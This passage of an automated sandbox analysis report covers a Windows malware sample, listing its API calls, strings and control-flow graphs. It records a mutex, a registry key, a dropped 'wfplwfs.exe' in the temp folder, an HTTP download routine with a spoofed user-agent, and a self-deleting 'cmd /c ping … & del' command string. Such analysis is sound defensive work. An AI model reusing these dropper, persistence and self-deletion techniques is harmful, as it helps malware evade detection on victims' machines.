                                                                                                                                                                                                                                                              control_flow_graph 172 401d20-401d6d InitializeSecurityDescriptor SetSecurityDescriptorDacl CreateMutexA 173 401d81 172->173 174 401d6f-401d7f GetLastError 172->174 175 401d83-401d87 173->175 174->173 174->175
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,?,?,?,?,?,?,0040117F), ref: 00401D2D
                                                                                                                                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?,0040117F), ref: 00401D3C
                                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE ref: 00401D65
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401D6F
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • Global\signature_netsetup, xrefs: 00401D42
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: DescriptorSecurity$CreateDaclErrorInitializeLastMutex
                                                                                                                                                                                                                                                              • String ID: Global\signature_netsetup
                                                                                                                                                                                                                                                              • API String ID: 4085719312-2187932148
                                                                                                                                                                                                                                                              • Opcode ID: 7c7a7a33da801d930861935cd136b829672ec26b7c289fe7f2e15a92e6601712
                                                                                                                                                                                                                                                              • Instruction ID: 0f99239409da629afb65f52e1844852861ea3dc71b8d285e289e10e62427dabb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c7a7a33da801d930861935cd136b829672ec26b7c289fe7f2e15a92e6601712
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43F06771104321ABE314DF91DD88BCB7BA8EF84704F004828F648E2290D3B9D58CCBEA
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

Control-flow Graph: [graph image not preserved; legend: Executed, Not Executed]
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00401FF0: _malloc.LIBCMT ref: 004020C5
                                                                                                                                                                                                                                                                • Part of subcall function 00401FF0: _memset.LIBCMT ref: 004020D1
                                                                                                                                                                                                                                                                • Part of subcall function 00401FF0: _malloc.LIBCMT ref: 00402112
                                                                                                                                                                                                                                                                • Part of subcall function 00401FF0: _memset.LIBCMT ref: 0040211D
                                                                                                                                                                                                                                                                • Part of subcall function 00401CC0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000000,?,00000000,004022BC,?,?,00000000), ref: 00401CE7
                                                                                                                                                                                                                                                                • Part of subcall function 00401CC0: _malloc.LIBCMT ref: 00401CF4
                                                                                                                                                                                                                                                                • Part of subcall function 00401CC0: _memset.LIBCMT ref: 00401CFF
                                                                                                                                                                                                                                                                • Part of subcall function 00401CC0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,004022BC,?,?,00000000), ref: 00401D13
                                                                                                                                                                                                                                                              • _wcscpy_s.LIBCMT ref: 00402313
                                                                                                                                                                                                                                                              • WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00402324
                                                                                                                                                                                                                                                              • WinHttpSetOption.WINHTTP ref: 00402350
                                                                                                                                                                                                                                                              • WinHttpConnect.WINHTTP(00000000,00000000,?,00000000), ref: 0040235B
                                                                                                                                                                                                                                                              • WinHttpOpenRequest.WINHTTP(00000000,?,?,HTTP/1.1,00000000,00000000,00000100), ref: 004023A0
                                                                                                                                                                                                                                                              • WinHttpQueryOption.WINHTTP(00000000,0000001F,?,?), ref: 004023C5
                                                                                                                                                                                                                                                              • WinHttpSetOption.WINHTTP(00000000,0000001F,?,00000004), ref: 004023DD
                                                                                                                                                                                                                                                              • WinHttpAddRequestHeaders.WINHTTP(00000000,User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36,000000FF,A0000000), ref: 004023F2
                                                                                                                                                                                                                                                              • WinHttpAddRequestHeaders.WINHTTP(00000000,00000000,000000FF,A0000000), ref: 00402409
                                                                                                                                                                                                                                                              • WinHttpSetTimeouts.WINHTTP(00000000,0000C350,0000C350,0000C350,0000C350), ref: 0040242B
                                                                                                                                                                                                                                                              • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040243E
                                                                                                                                                                                                                                                              • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 0040244F
                                                                                                                                                                                                                                                              • WinHttpQueryHeaders.WINHTTP(00000000,00000016,00000000,00000000,00000000,00000000), ref: 0040247D
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040247F
                                                                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00402496
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 004024AB
                                                                                                                                                                                                                                                              • WinHttpQueryHeaders.WINHTTP(00000000,00000016,00000000,00000000,?,00000000,?,?,?,00000004), ref: 004024C0
                                                                                                                                                                                                                                                                • Part of subcall function 00401C40: WideCharToMultiByte.KERNEL32(00000000,00000000,004024CC,004024CA,00000000,00000000,00000000,00000000,00000000,6F752AA0,00000000,6F73F270,?,004024CC,00000000), ref: 00401C75
                                                                                                                                                                                                                                                                • Part of subcall function 00401C40: _malloc.LIBCMT ref: 00401C80
                                                                                                                                                                                                                                                                • Part of subcall function 00401C40: _memset.LIBCMT ref: 00401C8B
                                                                                                                                                                                                                                                                • Part of subcall function 00401C40: WideCharToMultiByte.KERNEL32(00000000,00000000,?,004024CA,00000000,?,00000000,00000000,?,?,004024CC,00000000,?,?,?,00000004), ref: 00401CA7
                                                                                                                                                                                                                                                                • Part of subcall function 00401EF0: std::_String_base::_Xlen.LIBCPMT ref: 00401F16
                                                                                                                                                                                                                                                                • Part of subcall function 00401EF0: std::_String_base::_Xlen.LIBCPMT ref: 00401F2E
                                                                                                                                                                                                                                                                • Part of subcall function 00401EF0: _memcpy_s.LIBCMT ref: 00401FA9
                                                                                                                                                                                                                                                                • Part of subcall function 00402B57: __lock.LIBCMT ref: 00402B75
                                                                                                                                                                                                                                                                • Part of subcall function 00402B57: ___sbh_find_block.LIBCMT ref: 00402B80
                                                                                                                                                                                                                                                                • Part of subcall function 00402B57: ___sbh_free_block.LIBCMT ref: 00402B8F
                                                                                                                                                                                                                                                                • Part of subcall function 00402B57: HeapFree.KERNEL32(00000000,?,0044A918,0000000C,00405245,00000000,0044A9E0,0000000C,0040527D,?,?,?,0040BD2E,00000004,0044AD90,0000000C), ref: 00402BBF
                                                                                                                                                                                                                                                                • Part of subcall function 00402B57: GetLastError.KERNEL32(?,00403D95,00402CED,00000000,004018C3,?), ref: 00402BD0
                                                                                                                                                                                                                                                              • WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 0040253E
                                                                                                                                                                                                                                                              • _malloc.LIBCMT ref: 0040255C
                                                                                                                                                                                                                                                                • Part of subcall function 00402C34: __FF_MSGBANNER.LIBCMT ref: 00402C57
                                                                                                                                                                                                                                                                • Part of subcall function 00402C34: __NMSG_WRITE.LIBCMT ref: 00402C5E
                                                                                                                                                                                                                                                                • Part of subcall function 00402C34: HeapAlloc.KERNEL32(00000000,?,74E96E60,?,?,00000000,004018C3,?), ref: 00402CAC
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00402579
                                                                                                                                                                                                                                                              • WinHttpReadData.WINHTTP(00000000,00000000,?,?,?,?,?,00000004,?,?,?,?,?,?,00000000), ref: 0040258D
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000004,?,?,?,?,?,?,00000000), ref: 00402597
                                                                                                                                                                                                                                                              • _printf.LIBCMT ref: 004025A3
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00402633
                                                                                                                                                                                                                                                              • _printf.LIBCMT ref: 0040263F
                                                                                                                                                                                                                                                              • _printf.LIBCMT ref: 0040264E
                                                                                                                                                                                                                                                              • WinHttpCloseHandle.WINHTTP(00000000), ref: 0040265F
                                                                                                                                                                                                                                                              • WinHttpCloseHandle.WINHTTP(?), ref: 0040266E
                                                                                                                                                                                                                                                              • WinHttpCloseHandle.WINHTTP(00000000), ref: 00402679
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • GET, xrefs: 004022D8
                                                                                                                                                                                                                                                              • P, xrefs: 00402294
                                                                                                                                                                                                                                                              • HTTP/1.1, xrefs: 00402391
                                                                                                                                                                                                                                                              • A WinHTTP Example Program/1.0, xrefs: 0040231F
                                                                                                                                                                                                                                                              • User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, xrefs: 004023EC
                                                                                                                                                                                                                                                              • Out of memory., xrefs: 00402649
                                                                                                                                                                                                                                                              • WinHttpQueryDataAvailable failed. Error = %d, xrefs: 0040259E, 0040263A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Http$_malloc_memset$ByteCharErrorHeadersLastMultiQueryRequestWide$CloseHandleOption_printf$DataHeapOpenString_base::_Xlenstd::_$AllocAvailableConnectFreeReadReceiveResponseSendTimeouts___sbh_find_block___sbh_free_block__lock_memcpy_s_wcscpy_s
                                                                                                                                                                                                                                                              • String ID: A WinHTTP Example Program/1.0$GET$HTTP/1.1$Out of memory.$P$User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36$WinHttpQueryDataAvailable failed. Error = %d
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00401D20: InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,?,?,?,?,?,?,0040117F), ref: 00401D2D
                                                                                                                                                                                                                                                                • Part of subcall function 00401D20: SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?,0040117F), ref: 00401D3C
                                                                                                                                                                                                                                                                • Part of subcall function 00401D20: CreateMutexA.KERNELBASE ref: 00401D65
                                                                                                                                                                                                                                                                • Part of subcall function 00401D20: GetLastError.KERNEL32 ref: 00401D6F
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00401185
                                                                                                                                                                                                                                                              • RegCreateKeyExA.KERNELBASE ref: 004011C3
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004011D2
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 004011EE
                                                                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,00000000,?,00000000), ref: 00401200
                                                                                                                                                                                                                                                              • _strcat_s.LIBCMT ref: 00401215
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateDescriptorSecurity$CloseDaclErrorExitInitializeLastMutexPathProcessTemp_memset_strcat_s
                                                                                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\wfplwfs$wfplwfs.exe
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00401DB5
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00401DD1
                                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,?,00000000,00000103), ref: 00401DE5
                                                                                                                                                                                                                                                              • _sprintf.LIBCMT ref: 00401DFC
                                                                                                                                                                                                                                                              • WinExec.KERNEL32(?,00000000), ref: 00401E0E
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • cmd /c ping 127.0.0.1 -n 3 & del "%s", xrefs: 00401DF6
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _memset$ExecFileModuleName_sprintf
                                                                                                                                                                                                                                                              • String ID: cmd /c ping 127.0.0.1 -n 3 & del "%s"
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              control_flow_graph 167 401e80-401ec1 call 403de0 CreateProcessA 170 401ec3-401eda CloseHandle * 2 167->170 171 401edc-401ee3 167->171 170->171
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00401E97
                                                                                                                                                                                                                                                              • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,00000040), ref: 00401EB9
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00401ED3
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00401EDA
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseHandle$CreateProcess_memset
                                                                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              control_flow_graph 176 401790-4017a5 PathFileExistsA 177 401862-40186a 176->177 178 4017ab-4017c5 CreateFileA 176->178 178->177 179 4017cb-4017e3 GetFileTime 178->179 179->177 180 4017e5-40184b SystemTimeToFileTime call 40dba0 call 401710 179->180 180->177 185 40184d 180->185 186 401856-401861 185->186 187 40184f-401854 185->187 187->177 187->186
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • PathFileExistsA.KERNELBASE(?,00000000,00000000,00000000), ref: 0040179D
                                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,02000000,00000000), ref: 004017BC
                                                                                                                                                                                                                                                              • GetFileTime.KERNEL32(00000000,?,?,?), ref: 004017DB
                                                                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32 ref: 00401818
                                                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 00401836
                                                                                                                                                                                                                                                                • Part of subcall function 00401710: GetSystemTime.KERNEL32 ref: 00401746
                                                                                                                                                                                                                                                                • Part of subcall function 00401710: SystemTimeToFileTime.KERNEL32(?,?), ref: 0040175C
                                                                                                                                                                                                                                                                • Part of subcall function 00401710: SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00401768
                                                                                                                                                                                                                                                                • Part of subcall function 00401710: __aulldiv.LIBCMT ref: 00401782
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Time$File$System$__aulldiv$CreateExistsPath
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1778554304-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              control_flow_graph 188 401e30-401e66 CreateFileA WriteFile 189 401e68 188->189 190 401e6d-401e79 CloseHandle 188->190 189->190
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,00401226), ref: 00401E45
                                                                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,0040FD28,0003A000,?,00000000,?,?,?,00401226), ref: 00401E5E
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00401226), ref: 00401E6E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1065093856-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              control_flow_graph 191 405094-4050b2 HeapCreate 192 4050b4-4050b6 191->192 193 4050b7-4050c4 call 405039 191->193 196 4050c6-4050d3 call 405295 193->196 197 4050ea-4050ed 193->197 196->197 200 4050d5-4050e8 HeapDestroy 196->200 200->192
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000,004032BF,00000001), ref: 004050A5
                                                                                                                                                                                                                                                              • HeapDestroy.KERNEL32 ref: 004050DB
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$CreateDestroy
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3296620671-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              control_flow_graph 201 405fd0-405fde call 405faa ExitProcess
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • ___crtCorExitProcess.LIBCMT ref: 00405FD4
                                                                                                                                                                                                                                                                • Part of subcall function 00405FAA: GetModuleHandleA.KERNEL32(mscoree.dll,00405FD9,?,004051D3,000000FF,0000001E,0044A9E0,0000000C,0040527D,?,?,?,0040BD2E,00000004,0044AD90,0000000C), ref: 00405FAF
                                                                                                                                                                                                                                                                • Part of subcall function 00405FAA: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00405FBF
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00405FDE
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2427264223-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              control_flow_graph 204 406202-40620a call 406134 206 40620f-406212 204->206
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _doexit.LIBCMT ref: 0040620A
                                                                                                                                                                                                                                                                • Part of subcall function 00406134: __lock.LIBCMT ref: 00406142
                                                                                                                                                                                                                                                                • Part of subcall function 00406134: __decode_pointer.LIBCMT ref: 00406171
                                                                                                                                                                                                                                                                • Part of subcall function 00406134: __decode_pointer.LIBCMT ref: 0040617E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __decode_pointer$__lock_doexit
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3276244213-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0040399E
                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004039B3
                                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(0040E2A0), ref: 004039BE
                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 004039DA
                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 004039E1
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __decode_pointer.LIBCMT ref: 0040837B
                                                                                                                                                                                                                                                                • Part of subcall function 004065B2: TlsGetValue.KERNEL32(?,00404407,00402CE7,?,00000000,004018C3,?), ref: 004065BF
                                                                                                                                                                                                                                                                • Part of subcall function 004065B2: TlsGetValue.KERNEL32(00000005,?,00404407,00402CE7,?,00000000,004018C3,?), ref: 004065D6
                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00408382
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360949225.000000000044C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2361060928.000000000044F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CGZL5y3D81OCbb2NABnHZhPM.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1958600898-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000C.00000002.2360179635.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360041485.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000C.00000002.2360254220.000000000040E000.00000002.00000001.01000000.0000000A.sdmp
